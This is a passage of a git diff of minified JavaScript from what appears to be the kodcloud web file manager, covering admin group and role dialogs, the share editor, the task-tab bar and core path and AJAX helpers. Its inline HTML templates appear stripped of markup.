i=t.getSelectedNodes()[0],n=i.getParentNode(),o=G.appHost+"systemGroup/del&groupID="+e;$.dialog({id:"dialog-path-remove",fixed:!0,icon:"question",title:LNG.system_group_remove,padding:30,width:300,lock:!0,background:"#000",opacity:.3,content:LNG.system_group_remove_tips,ok:function(){$.ajax({url:o,type:"POST",dataType:"json",beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(t){Tips.close(t),System.systemMember.resetList(),r("folder-list-tree",n.id),c(),"function"==typeof a&&a(e)}})},cancel:!0})},m=function(){var e=1073741824*parseFloat($(".size-max-set input").val()),t=pathTools.fileSize(e);0==e||isNaN(e)?$(".size-max-set i").html(LNG.space_tips_default):$(".size-max-set i").html(t)},v=function(){var e=$("#group-parent-select"),t=$("input[name=parentID]").val();if(e.find("a.menuGroup").removeClass("curSelectedNode"),""==t)return $(".select-parent-content .group-title").html("is root"),!1;var a=u(t);return $(".select-parent-content .group-title").html(a.name),e.find("a[data-group-id="+t+"]").addClass("curSelectedNode"),!0},g=function(){var e=$("#group-parent-select");$.fn.zTree.init(e,s,a);var t=$.fn.zTree.getZTreeObj("group-parent-select");t&&t.expandAll(!0),v()&&$(".select-parent-content .btn").unbind("click").bind("click",function(){$(".select-group").toggleClass("hidden")})},b=function(t){var a=e("./tpl/group.html"),i=template.compile(a),n=i({LNG:LNG,groupInfo:t}),o=$.dialog({id:"share-dialog",simple:!0,resize:!1,width:425,background:"#000",opacity:.1,title:"",padding:"0",fixed:!0,lock:!0,content:n});m(),System.sizeUse($(".share-view-info")),g(),$(".input-line #name").textFocus(); var s=G.appHost+"systemGroup/add";if(""!=t.name)var s=G.appHost+"systemGroup/edit&groupID="+t.groupID;$("#system-save").unbind("click").bind("click",function(){r()}),$(".dialog-goto-path").unbind("click").bind("click",function(){System.openPath(t)}),$(".remove-button").unbind("click").bind("click",function(){h(t.groupID,function(){o.close()})}),$(".content-box input").keyEnter(function(){r(!0)}),$("#system-save-and-add").unbind("click").bind("click",function(){r(!0)}),$(".user-setting-more-btn").unbind("click").bind("click",function(){$(".user-setting-more").toggleClass("hidden")}),$(".select-path a.select-btn").unbind("click").bind("click",function(){var e=this;core.api.pathSelect({type:"folder",title:LNG.path_api_select_folder,firstPath:$(".select-path input").val()},function(t){$(e).parent().find("input").val(t)})}),$(".select-path a.reset").unbind("click").bind("click",function(){$(this).parent().find("input").val("")});var r=function(e){var a="";$(".share-dialog .content-info input[name]").each(function(){var e=urlEncode($(this).val());""!=e&&(a+="&"+$(this).attr("name")+"="+e)}),$.ajax({url:s,data:a,type:"POST",dataType:"json",beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(a){return Tips.close(a),a.code||"version_error"!=a.info?(a.code&&(c(),""!=t.name||1!=e?o.close():setTimeout(function(){$(".input-line #name").val("").textFocus()},200)),void 0):($.dialog({content:a.data,padding:"30px 25px",width:"300px",okVal:LNG.learn_more,ok:function(){window.open(core.versionUpdateVip)}}),void 0)}})}},y=function(e){var t=u(e);t&&($(".group-title .group-title-span").html(t.name),$(".group-size").html(t.config.sizeUse+"/"+t.config.sizeMax),$("#content-system-group .group-id").html(e),System.sizeUse($(".group-size")),System.systemMember.loadList(e))},k=function(){$(".size-max-set input").live("input",m),$("#content-system-group .header-content [data-action]").live("click",function(){var e=$(this).attr("data-action"),t=$("#content-system-group .group-id").html(),a=u(t);switch(e){case"group-edit":b(a);break;case"group-home":System.openPath(a);break;case"group-add-child":var i=u();i.parentID=t,b(i);break;default:}})};return k(),{init:o,getGroupInfo:u,groupDefaultData:f,getListTree:function(){return a},getList:function(){return i}}}),define("app/src/setting/system/tpl/group.html",[],'
      \n
      \n
      \n {{if !groupInfo.name}}\n {{LNG.system_group_create}}\n {{else}}\n {{groupInfo.name}}\n {{/if}}\n
      \n {{if groupInfo.name}}\n \n {{/if}}\n
      \n
      \n
      \n {{LNG.system_group_name}}:\n \n {{if groupInfo.name}}\n \n \n \n {{else}}\n {{LNG.name}}\n {{/if}}\n
      \n
      \n
      \n {{LNG.space_size}}:\n \n \n
      \n
      \n
      \n {{LNG.system_group_father}}:\n \n \n \n
      \n
      \n\n
      \n  \n {{LNG.more}}\n
      \n
      \n
      \n
      \n {{LNG.system_set_home_path}}:\n \n \n \n \n \n \n \n
      \n
      \n
      \n
      \n\n \n
      \n\n'),define("app/src/setting/system/systemRole",[],function(){var e,t,a=function(){$.ajax({url:G.appHost+"systemRole/get",dataType:"json",async:!1,success:function(a){return a.code?(e=a.data,i(),void 0==t&&(t="1"),n(t),void 0):(Tips.tips(a),void 0)}})},i=function(){var t="";$.each(e,function(e,a){t+='
    • '+""+a.name+'
    • '}),t+='
    • ',$(".role-list-cell").html(t)},n=function(a){var i;t=a,$(".system-role li.role-cell").removeClass("select"),$(".system-role [data-role-id="+a+"]").addClass("select"),$("#content-system-role [data-action=role-delete]").show(),$("#content-system-role .group-title .label-info").show(),"0"==a?(i={name:"",extNotAllow:"php|jsp|asp|html|htm"},$("#content-system-role [data-action=role-delete]").hide(),$("#content-system-role .group-title .label-info").hide(),$("#content-system-role .role_title").html(LNG.system_role_add)):(i=e[a],$("#content-system-role .role_title").html(i.name),$("#content-system-role .role-id").html(a)),$(".group-editor #name").val(i.name).textFocus(),$(".group-editor #extNotAllow").val(i.extNotAllow),$(".group-editor .tag").removeClass("this"),$(".group-editor input").removeAttr("checked"),$(".group-editor .tag").each(function(){var e=$(this),t=e.attr("data-role");t=t.split(";"),t=t[0],i[t]&&(e.addClass("this"),e.find("input").attr("checked",!0))})},o=function(){if(!G.isRoot)return Tips.tips(LNG.group_role_error,"warning"),void 0;var e=$(".group-editor #name").val(),i=$(".group-editor #extNotAllow").val(),n={},o=G.appHost+"systemRole/add";return void 0==i&&(i=""),""==e?(Tips.tips(LNG.not_null,"error"),!1):($(".group-editor .tag.this").each(function(){for(var e=$(this).attr("data-role").split(";"),t=0;e.length>t;t++)n[e[t]]=1}),"1"==t&&n!={}&&(n="postEmpty=1"),"0"!=t&&(o=G.appHost+"systemRole/edit&roleID="+t),$.ajax({url:o+"&name="+urlEncode(e)+"&extNotAllow="+i,data:n,type:"POST",dataType:"json",success:function(e){Tips.tips(e),e.code&&(t=e.info,a(),System.systemMember.loadList(""))}}),void 0)},s=function(e){return G.isRoot?($.dialog({fixed:!0,icon:"question",padding:"30px 40px",drag:!0,title:LNG.warning,content:LNG.if_remove+c(e)+"?
      "+LNG.group_remove_tips,cancel:!0,ok:function(){$.ajax({url:G.appHost+"systemRole/del&roleID="+e,async:!1,dataType:"json",success:function(e){Tips.tips(e),e.code&&(t=void 0,a(),System.systemMember.resetList(),System.systemMember.loadList(""))}})}}),void 0):(Tips.tips(LNG.group_role_error,"warning"),void 0)},r=function(){$(".group-editor .tag").each(function(){$(this).hasClass("this")?($(this).removeClass("this"),$(this).find("input").removeAttr("checked")):($(this).addClass("this"),$(this).find("input").attr("checked",!0)),$(".group-editor .combox:eq(0) .tag:eq(0)").hasClass("this")||($(".group-editor .combox:eq(0) .tag").removeClass("this"),$(".group-editor .combox:eq(0) .tag").find("input").removeAttr("checked")),$(".group-editor .combox:eq(1) .tag:eq(0)").hasClass("this")||($(".group-editor .combox:eq(1) .tag").removeClass("this"),$(".group-editor .combox:eq(1) .tag").find("input").removeAttr("checked"))})},l=function(){$(".group-editor .tag").live("click",function(){var e=$(this);if(select=!1,e.toggleClass("this"),e.hasClass("this")?(select=!0,e.find("input").attr("checked",!0)):(select=!1,e.find("input").removeAttr("checked")),e.parent().hasClass("combox")){var t=e.index();1==t&&0==select&&(e.parent().find(".tag").removeClass("this"),e.parent().find("input").removeAttr("checked")),1!=t&&1==select&&(e.parent().find(".tag:eq(0)").addClass("this"),e.parent().find("input:eq(0)").attr("checked",!0))}}),$(".system-role li.role-cell").live("click",function(){n($(this).attr("data-role-id"))}),$("#content-system-role [data-action]").live("click",function(e){var a=$(this).attr("data-action");switch($(this),a){case"role-delete":s(t);break;case"role-edit-save":o();break;case"revert-all":r();break;default:}stopPP(e)})},c=function(t){var a=e[t];return a?a.name:'null'},d=function(){var t={};return $.each(e,function(e,a){t[e]=a.name}),t};return l(),{init:a,getList:d,setSelect:n}}),define("app/src/setting/system/systemGroupRole",[],function(e){var t,a,i=function(e){n(),p(),"function"==typeof e&&e()},n=function(){$.get(G.appHost+"systemRole/get&group_role=1&action=get",function(e){t=e.data,a=e.info})},o=function(){System.systemMember.resetUserList()},s=function(){var i=e("./tpl/groupRoleSetting.html"),n=template.compile(i),o=n({LNG:LNG,groupRoleData:t,roleDefine:a,style:["blue-deep","blue-nomal","blue-light","grey-deep","grey-nomal","grey-light","yellow-deep","yellow-nomal","yellow-light","green-deep","green-nomal","green-light"]});$.dialog({id:"system-role-group-box",resize:!0,width:700,height:590,title:LNG.system_group_role_title,padding:"0",opacity:.3,background:"#fff",lock:!0,fixed:!0,content:o}),r()},r=function(e){var a="";$.each(t,function(e,t){a+=''+t.name+''}),a+='',$(".group-role-setting .role-list-cell").html(a),void 0==e&&(e="1"),l(e)},l=function(e){var a=t[e],i=$(".group-role-setting"),n=$(".system-group-role-save"),o=$(".system-group-role-remove");i.find(".role-cell").removeClass("select"),i.find("[data-role-id="+e+"]").addClass("select"),n.html(LNG.button_save),o.removeClass("hidden"),a||(a={name:"",style:"blue-deep",display:1,actions:[]},n.html(LNG.button_add),o.addClass("hidden")),i.find("[name=name]").val(a.name),i.find("[name=display]").prop("checked",parseInt(a.display)),i.find(".role-label-display").html(a.name),i.find(".group-role-check .checkbox").prop("checked",!1),$.each(a.actions,function(e,t){1==t&&i.find('[data-role="'+e+'"]').prop("checked",!0)}),d(a.style),c()},c=function(){$(".item-main[data-role-group]").each(function(){$(this).attr("data-role-group"),$(this).next().find(".checkbox").length;var e=$(this).next().find(".checkbox:checked").length;0==e?$(this).find(".checkbox").prop("checked",!1):$(this).find(".checkbox").prop("checked",!0)})},d=function(e){var t=".group-role-setting";$(t).find(".role-style").removeClass("select"),$(this).addClass("select");var a=$(t).find("[name=style]"),i=$(t+" .role-label-display");i.removeClass("label-"+a.val()).addClass("label-"+e),a.val(e)},p=function(){var e=".group-role-setting";$(e).find(".role-cell").die("click").live("click",function(){var e=$(this).attr("data-role-id");l(e)}),$(e).find(".item-main").die("click").live("click",function(){var e=$(this).attr("data-role-group"),t=$(this).find("input").prop("checked");$("[data-role-group="+e+"] .checkbox").prop("checked",t)}),$(e).find(".group-role-check .content .item").die("click").live("click",function(){c()}),$(e).find(".role-style").die("click").live("click",function(){var e=$(this).attr("data-style");d(e)}),$(e).find("[name=name]").die("input propertychange").live("input propertychange",function(){$(e).find(".role-label-display").html($(this).val())}),$(".system-group-role-save").die("click").live("click",function(){var a=$(e).find(".role-cell.select").attr("data-role-id"),i="set";"0"==a&&(i="add");var n={};$(e).find(".group-role-check .content .checkbox").each(function(){var e=$(this).attr("data-role"),t=Number($(this).prop("checked"));n[e]=t});var s={name:$(e).find("[name=name]").val(),style:$(e).find("[name=style]").val(),display:Number($(e).find("[name=display]").prop("checked")),actions:n};$.ajax({url:G.appHost+"systemRole/roleGroupAction&action="+i+"&roleID="+a,beforeSend:function(){Tips.loading()},data:"role_arr="+jsonEncode(s),error:core.ajaxError,success:function(e){if(Tips.close(e),e.code){t=e.info,o();var n=a;"add"==i&&(n=e.data[0]),r(n)}}})}),$(".system-group-role-remove").die("click").live("click",function(){var t=$(e).find(".role-cell.select").attr("data-role-id");return"1"==t||"2"==t?(Tips.tips(LNG.default_user_can_not_do,"warning"),void 0):(u(t),void 0)})},u=function(e){$.dialog({id:"dialog-user-confirm",fixed:!0,icon:"question",padding:30,width:250,lock:!0,background:"#000",opacity:.2,content:LNG.system_group_role_remove,ok:function(){$.ajax({url:G.appHost+"systemRole/roleGroupAction&action=del&roleID="+e,beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),e.code&&(t=e.info,r(),o())}})},cancel:!0})};return{init:i,showBox:s,getList:function(){return t}}}),define("app/src/setting/system/tpl/groupRoleSetting.html",[],'\n
      \n
      \n
      \n
      \n
      \n
      \n
      {{LNG.name}}:
      \n
      \n \n
      \n
      \n
      \n
      {{LNG.system_group_role_style}}:
      \n
      \n \n \n \n
      \n \n
      \n
      \n
      {{LNG.system_group_role_display}}:
      \n
      \n \n
      \n
      \n \n
      \n
      \n
      {{LNG.permission}}:
      \n
      \n {{each roleDefine value key}}\n
      \n \n
      \n\n
      \n {{each value valueAction keyItem}}\n
      \n \n
      \n {{/each}}\n
      \n {{/each}}\n
      \n
      \n\n \n
      \n
      \n \n \n
      \n
      \n
      \n
      \n\n
      \n
      \n'); \ No newline at end of file diff --git a/static/js/app/src/shareEditor/main.js b/static/js/app/src/shareEditor/main.js index 139c0f3..3e70332 100755 --- a/static/js/app/src/shareEditor/main.js +++ b/static/js/app/src/shareEditor/main.js @@ -1,6 +1,6 @@ -/*! power by kodcloud ver4.05(2017-08-26) [build 1503738026262] */ +/*! power by kodcloud ver4.06(2017-08-30) [build 1504089913395] */ define("app/src/shareEditor/main",["lib/jquery-lib","lib/util","lib/ztree/ztree","lib/contextMenu/jquery-contextMenu","lib/artDialog/jquery-artDialog","lib/ace/src-min-noconflict/ace","../../common/taskTap","../../common/core","../../common/rightMenuExtence","../../app/appBase","../../app/editor","../../app/openWith","../../app/html","../../shareCommon/rightMenu","./ui","../../common/tree","../../path/pathOperate","../../path/clipboard","../../path/search","../../shareCommon/topbar"],function(e){Config={TreeId:"folder-list-tree",AnimateTime:200,pageApp:"editor",treeAjaxURL:"share/treeList&app=editor&user="+G.user+"&sid="+G.sid},e("lib/jquery-lib"),e("lib/util"),e("lib/ztree/ztree"),e("lib/contextMenu/jquery-contextMenu"),e("lib/artDialog/jquery-artDialog"),e("lib/ace/src-min-noconflict/ace"),TaskTap=e("../../common/taskTap"),core=e("../../common/core"),rightMenu=e("../../shareCommon/rightMenu"),ui=e("./ui"),tree=e("../../common/tree"),ui.tree=tree;var t=e("../../shareCommon/topbar");$(document).ready(function(){rightMenu.initEditor(),core.init(),$(".init-loading").fadeOut(450).addClass("pop_fadeout"),t.init(),G.project.length>1&&(Config.treeAjaxURL+="&project="+urlEncode(G.project)),ui.init(),TaskTap.init()})}),define("app/common/taskTap",[],function(){var e={},t="",a=160,i=function(){$(".task-tab .tab").die("mouseenter").live("mouseenter",function(){$(this).hasClass("this")||$(this).addClass("hover")}).die("mouseleave").live("mouseleave",function(){$(this).removeClass("hover")})},n=function(e){var t=e.attr("id"),a=$.dialog.list[t];if(void 0==a)return c(t),void 0;var i=$("."+t);"hidden"==i.css("visibility")?a.display(!0).zIndex():i.hasClass("aui-state-focus")?a.display(!1):a.zIndex()},o=function(){var e,t,i,o,s=!1,r=!1,l=0,c=0,d=0,p=0,u=0,f=0;$(".task-tab .tab").die("mousedown").live("mousedown",function(t){1==t.which&&(e=$(this),h(t),this.setCapture&&this.setCapture(),$(document).mousemove(function(e){m(e)}),$(document).one("mouseup",function(t){g(),this.releaseCapture&&this.releaseCapture(),10>Math.abs(t.pageX-l)&&n(e)}))});var h=function(a){s=!0,r=!0,l=a.pageX,$tab_parent=$(".task-tab"),t=$(".task-tab .tab"),$(".tasktab-dragging").remove(),i=e.clone().addClass("tasktab-dragging").prependTo("body"),p=$sizeInt(t.css("margin-right")),u=$tab_parent.width(),f=$tab_parent.get(0).getBoundingClientRect().left,f+=$(window).scrollLeft(),c=e.get(0).getBoundingClientRect().left,d=$sizeInt(t.css("width"));var n=e.get(0).getBoundingClientRect().top-$sizeInt(e.css("margin-top")),o=a.clientX-l+c;$("body").prepend("
      "),i.css({width:d+"px",top:n,left:o}),e.css("opacity",0)},m=function(a){if(r){window.getSelection?window.getSelection().removeAllRanges():document.selection.empty(),0==s&&h(a);var n=a.clientX-l+c;f>n||n>f+u-d||(i.css("left",n),t.each(function(){var t=$(this).get(0).getBoundingClientRect().left;if(n>t&&t+d/2+p>n){if(e.attr("id")==$(this).attr("id"))return;v($(this).attr("id"),"left")}if(n>t-d/2+p&&t>n){if(e.attr("id")==$(this).attr("id"))return;v($(this).attr("id"),"right")}}))}},v=function(i,n){if(!e.is(":animated")||o!=i){o=i,e.stop(!0,!0),$(".insertTemp").remove(),t=$(".task-tab .tab");var s=e.width(),r=$(".task-tab #"+i),l=e.clone(!0).insertAfter(e).css({"margin-right":"0px",border:"none"}).addClass("insertTemp");"left"==n?e.after(r).css("width","0px"):(e.before(r).css("width","0px"),r.before(l)),e.animate({width:s+"px"},a),l.animate({width:"0px"},a,function(){$(this).remove(),t=$(".task-tab .tab")})}},g=function(){r=!1,s=!1,startTime=0,$(".dragMaskView").remove(),void 0!=i&&(c=e.get(0).getBoundingClientRect().left,i.animate({left:c+"px"},a,function(){e.css("opacity",1),$(this).remove()}))}},s=function(e){var t=110,i=t,n=t+12,o=$(".task-tab .tab"),s=$(".task-tab .tabs").width()-10,r=o.length,l=Math.floor(s/n);switch(r>l&&(i=Math.floor(s/r)-12),e){case"add":$(".task-tab .tabs .this").css("width","0").animate({width:i+"px"},a);case"close":o.animate({width:i+"px"},a);break;case"resize":o.css("width",i+"px");break;default:}},r=function(t,a){$(".task-tab").removeClass("hidden");var i=a.replace(/<[^>]+>/g,""),n='";$(n).insertBefore(".task-tab .last"),s("add"),e[t]={id:t,name:name}},l=function(e){$(".task-tab .this").removeClass("this"),$(".task-tab #"+e).addClass("this"),t=e},c=function(t){$(".task-tab #"+t).animate({width:0},a,function(){if($(".task-tab #"+t).remove(),s("close"),0==$(".tabs .tab").length&&!core.isApp("desktop")){var e=31;$(".task-tab").animate({bottom:"-"+e+"px"},200,0,function(){$(this).css({bottom:"0px"}).addClass("hidden")})}}),delete e[t]},d=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-taskbar",items:{"quit-others":{name:LNG.close_others,className:"quit-others",icon:"remove-circle",accesskey:"o"},quit:{name:LNG.close,className:"quit",icon:"remove",accesskey:"q"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"quit-others":$.each($.dialog.list,function(e,t){a!=e&&t.close()});break;case"quit":i.close()}}})},p=function(){$.contextMenu({zIndex:9999,selector:".task-tab",items:{closeAll:{name:LNG.dialog_close_all,icon:"remove-circle",accesskey:"q"},showAll:{name:LNG.dialog_display_all,icon:"th-large",accesskey:"s"},hideAll:{name:LNG.dialog_min_all,icon:"remove",accesskey:"h"}},callback:function(e,t){var a=t.$trigger.attr("id");switch($.dialog.list[a],e){case"showAll":$.each($.dialog.list,function(e,t){t.display(!0)});break;case"hideAll":$.each($.dialog.list,function(e,t){t.display(!1)});break;case"closeAll":$.each($.dialog.list,function(e,t){t.close()});break;default:}}})};return{add:r,focus:l,close:c,init:function(){var e='
      ';$(e).appendTo("body"),core.isApp("desktop")||$(".task-tab").addClass("hidden"),$(window).bind("resize",function(){s("resize")}),i(),d(),p(),o()}}}),define("app/common/core",["./rightMenuExtence","../app/appBase","../app/editor","../app/openWith","../app/html"],function(require,exports){tplUpload=require("./tpl/upload.html"),tplFormMake=require("./tpl/formMake.html");var tools=require("./core.tools"),upload=require("./core.upload"),api=require("./core.api"),playSound=require("./core.playSound"),formMake=require("./core.formMake");require("./rightMenuExtence"),kodApp=require("../app/appBase"),require("../app/editor"),require("../app/openWith"),require("../app/html"),pathHashEncode=function(e){return hashEncode(e)},pathHashDecode=function(e){return hashDecode(e)};var initTemplate=function(){window.require=require,template.config||(template.config=function(e,t){template.defaults[e]=t},template.helper=function(e,t){template.defaults.imports[e]=t}),template.config("escape",!1),template.config("compress",!0),template.helper("kod",{$:$,window:window,log:console.log,core:core,pathTools:window.pathTools,inArray:inArray}),template.defaults.imports.pathTools=window.pathTools,template.defaults.escape=!1,"_dev"==G.environment?(template.defaults.cache=!1,template.defaults.minimize=!1,template.defaults.compileDebug=!0):(template.defaults.cache=!0,template.defaults.minimize=!0,template.defaults.compileDebug=!1)},initFirst=function(){initTemplate(),"undefined"!=typeof G&&(1!=G.isRoot&&$(".menu-system-setting").remove(),G.isRoot||core.authCheck("systemMember.get")||1==core.authCheck("systemGroup.get")||$(".menu-system-group").remove(),G.userConfig&&"0"==G.userConfig.animateOpen&&($.dialog.defaults.animate=!1),resetHost()),$("html").bind("click",function(e){if(0==$(e.target).parents(".context-menu-list").length)try{$.contextMenu.hidden()}catch(e){}}),$.dialog.defaults.animate&&loadRipple(["a","button",".ripple-item",".context-menu-item","#picker",".menuShareButton",".menu-recycle-button",".section .list"],[".disabled",".disable",".ztree",".disable-ripple"]),$("a,img").attr("draggable","false"),$.ajaxSetup({headers:{"X-CSRF-TOKEN":Cookie.get("X-CSRF-TOKEN")}}),$(".common-footer [forceWap]").click(function(){var e=$(this).attr("forceWap");Cookie.set("forceWap",e),window.location.reload()}),core.setSkinDiy(),core.tools.init();for(var e=0;window.kodReady.length>e;e++)try{window.kodReady[e]()}catch(t){console.error("kodReady error:",t)}Hook.trigger("kodReady.end"),titleTips()},resetHost=function(){var e=window.location,t=e.port?":"+e.port:"";G.webHost=e.protocol+"//"+e.hostname+t+"/",G.appHost=rtrim(G.webHost,"/")+e.pathname.replace("index.php","")+"index.php?",G.appRoot=rtrim(G.webHost,"/")+e.pathname.replace("index.php",""),"1"==G.settings.paramRewrite&&(G.appHost=G.appHost.replace("index.php?","index.php/"))},titleTips=function(){isWap()||require.async(["lib/poshytip/jquery.poshytip.js","lib/poshytip/skin.css"],function(){var e=$("[title]");e.poshytip({className:"ptips-skin",liveEvents:!0,slide:!1,alignTo:"cursor",alignX:"right",alignY:"bottom",showAniDuration:150,hideAniDuration:200,offsetY:10,offsetX:20,showTimeout:function(){var e=1500;return $(this).attr("title-timeout")&&(e=parseInt($(this).attr("title-timeout"))),e},content:function(){var e=$(this).data("title.poshytip");if($(this).attr("title-data")){var t=$($(this).attr("title-data"));e=t.is("input")||t.is("textarea")?t.val():t.html()}return e=e?e:"",e.replace(/\n/g,"
      ")}}),$("body").bind("mousedown click",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()}),$("input,textarea").live("focus",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()})})};return{init:initFirst,serverDwonload:upload.serverDwonload,upload:upload.upload,uploadInit:upload.init,playSound:playSound.playSound,playSoundFile:playSound.playSoundFile,tools:tools,api:api,formMake:formMake,getPathIcon:function(e,t){if(t=void 0==t?"":t,"string"==$.type(e)){var a=trim(trim(e),"/");if(e={},"{"!=a.substring(0,1)||a.split("/").length>1)return{icon:"",name:""};e.pathType=a.match(/\{.*\}/),e.id=a.split(":")[1]}var i={};i[G.KOD_USER_SHARE]={icon:"user-self",name:LNG.my_share},i[G.KOD_GROUP_PATH]={icon:"group-self-owner"},i[G.KOD_GROUP_SHARE]={icon:"group-guest"},i[G.KOD_USER_SELF]={icon:"user-self"},i[G.KOD_USER_RECYCLE]={icon:"recycle",name:LNG.recycle},i[G.KOD_USER_FAV]={icon:"tree-fav",name:LNG.fav},i[G.KOD_GROUP_ROOT_SELF]={icon:"group-self-root",name:LNG.my_kod_group},i[G.KOD_GROUP_ROOT_ALL]={icon:"group-root",name:LNG.kod_group};var n=i[e.pathType];return e.pathType==G.KOD_USER_SHARE&&G.userID!=e.id?n={icon:"user",name:t}:e.pathType==G.KOD_GROUP_PATH&&"owner"==e.role&&(n={icon:"group-self-owner"}),void 0==n&&(n={icon:"",name:""}),void 0==n.name&&(n.name=t),n},isSystemPath:function(e){var e=trim(trim(e),"/");if(void 0==e||"{"!=e.substring(0,1)||e.split("/").length>1)return!1;var t=e.match(/\{.*\}/),a=[G.KOD_USER_SHARE,G.KOD_GROUP_SHARE,G.KOD_USER_RECYCLE,G.KOD_USER_FAV,G.KOD_GROUP_ROOT_SELF,G.KOD_GROUP_ROOT_ALL];return-1!==$.inArray(t[0],a)?!0:!1},pathPre:function(e){if(e=trim(trim(e),"/"),void 0==e||"{"!=e.substring(0,1))return"";var t=e.match(/\{.*\}/);return t[0]},contextmenu:function(e){try{$.contextMenu.hidden()}catch(t){}var t=e||window.event;return t?t&&$(t.target).is("textarea")||$(t.target).is("input")||$(t.target).is("p")||$(t.target).is("pre")||0!=$(t.target).parents(".can-right-menu").length||0!=$(t.target).parents(".topbar").length||0!=$(t.target).parents(".edit-body").length||0!=$(t.target).parents(".aui-state-focus").length?!0:!1:!0},pathThis:function(e){if(!e||"/"==e)return"";var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/"),i=t.substr(a+1);if(0==i.search("fileProxy")){i=urlDecode(i.substr(i.search("&path=")));var n=i.split("/");i=n[n.length-1],""==i&&(i=n[n.length-2])}return i},pathClear:function(e){if(!e)return"";var t=e.replace(/\\/g,"/");return t=t.replace(/\/+/g,"/"),t=t.replace(/\.+\//g,"/")},pathFather:function(e){var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/");return t.substr(0,a+1)},pathExt:function(e){var t=trim(e,"/");return-1!=t.lastIndexOf("/")&&(t=t.substr(t.lastIndexOf("/")+1)),-1!=t.lastIndexOf(".")?t.substr(t.lastIndexOf(".")+1).toLowerCase():t.toLowerCase()},pathUrlEncode:function(e){if(!e)return"";var t=urlEncode(e);return t=t.replace(/%2F/g,"/")},path2url:function(e,t){if("http"==e.substr(0,4))return e;void 0==t&&(t=!0);var a,i=this.pathClear(e);return G.isRoot&&t&&i.substring(0,G.webRoot.length)==G.webRoot?a=G.webHost+this.pathUrlEncode(i.replace(G.webRoot,"")):(a=G.appHost+"explorer/fileProxy&accessToken="+G.accessToken+"&path="+urlEncode(i),G.sharePage!==void 0&&(a=G.appHost+"share/fileProxy&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(i),i.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE&&(a=G.appHost+"share/fileProxy&path="+urlEncode(i)))),a},pathCommon:function(e){if("http"==e.substr(0,4))return urlEncode(e);if(e.substr(0,G.KOD_USER_SHARE.length)==G.KOD_USER_SHARE)return urlEncode(e);var t=this.pathClear(e),a=urlEncode(t);return G.sharePage!==void 0&&(a=urlEncode(G.KOD_USER_SHARE+":"+G.user+"/"+G.shareInfo.path+t)),a},isApp:function(e){if("undefined"==typeof Config)return!1;var t=Config.pageApp;return"string"==typeof e?t==e:$.isArray(e)?-1!==$.inArray(t,e)?!0:!1:!1},pathReadable:function(e){if("object"!=typeof G.jsonData)return!0;for(var t=G.jsonData.fileList,a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;t=G.jsonData.folderList;for(var a=0;t.length>a;a++)if(t[a].path==e)return void 0==t[a].isReadable||1==t[a].isReadable?!0:!1;return!0},pathCurrentWriteable:function(){return core.isApp("editor")?!1:G.jsonData.info?G.jsonData.info.canUpload:!1},authCheck:function(e,t){return G.isRoot?!0:AUTH.hasOwnProperty(e)&&AUTH[e]?!0:(t&&(t=t===!0?LNG.no_permission:t,Tips.tips(t,!1)),!1)},ajaxError:function(e){var t=e.responseText,a=$.dialog.list.ajaxErrorDialog;return Tips.close(LNG.system_error,!1),""==t.substr(0,17)?(setTimeout(function(){var e=ShareData.frameTop();e.location.reload()},500),void 0):(0==e.status&&""==t&&(t="网络连接错误 (net::ERR_CONNECTION_RESET),连接已重置
      请联系主机商或网管,检查防火墙配置!"),t='
      '+t+"
      ",a?a.content(t):$.dialog({id:"ajaxErrorDialog",padding:0,width:"60%",height:"50%",fixed:!0,resize:!0,ico:core.icon("error"),title:"ajax error",content:t}),void 0)},fileGet:function(e,t,a){var i="filename";"http"==e.substr(0,4)&&(i="fileUrl");var n=G.appHost+"editor/fileGet&"+i+"="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/fileGet&user="+G.user+"&sid="+G.sid+"&"+i+"="+urlEncode(e)),(e.indexOf("editor/fileGet&")>=0||e.indexOf("share/fileGet&")>=0)&&(n=e),$.ajax({url:n,dataType:"json",error:function(e,t,i){core.ajaxError(e,t,i),"function"==typeof a&&a()},success:function(e){e.code&&"function"==typeof t&&(1==e.data.base64&&(e.data.content=base64Decode(e.data.content)),t(e.data.content,e,n)),e.code||a(e.data)}})},fileInfo:function(e,t){var a=G.appHost+"explorer/pathInfo";G.sharePage!==void 0&&(a=G.appHost+"share/pathInfo&user="+G.user+"&sid="+G.sid),$.ajax({url:a,type:"POST",dataType:"json",data:e,error:core.ajaxError,success:function(e){"function"==typeof t&&t(e)}})},fileLink:function(e,t){if(e=this.pathClear(e),G.isRoot&&e.substring(0,G.webRoot.length)==G.webRoot){var a=G.webHost+this.pathUrlEncode(e.replace(G.webRoot,""));return"function"==typeof t&&t(a),void 0}var i='dataArr=[{"type":"file","path":"'+urlEncode(e)+'"}]&viewPage=1';this.fileInfo(i,function(e){var a=e.code?e.data.downloadPath:!1;return a?("function"==typeof t&&t(a),void 0):(Tips.tips(LNG.no_permission_action+"==>"+LNG.group_role_pathinfo,!1),void 0)})},setting:function(e){void 0==e&&(e=G.isRoot?"system":"user");var t="85%",a="85%";isWap()&&(t="100%",a="100%"),ShareData.frameTop("Opensetting_mode")?ShareData.frameTop("Opensetting_mode",function(t){t.Setting.setGoto(e),$.dialog.list.setting_mode.display(!0)}):$.dialog.open(G.appHost+"setting#"+e,{id:"setting_mode",fixed:!0,ico:core.icon("setting"),resize:!0,title:LNG.setting,width:t,height:t})},copyright:function(){var e=require("./tpl/copyright.html"),t=template.compile(e),a=ShareData.frameTop();a.art.dialog({id:"dialog-copyright",bottom:0,right:0,simple:!0,resize:!1,title:LNG.about,width:425,padding:"0",fixed:!0,content:t({LNG:LNG,G:G})}),a.$(".dialog-copyright").addClass("animated-700 zoomIn")},qrcode:function(e,t){"./"==e.substr(0,2)&&(e=G.appHost+e.substr(2));var 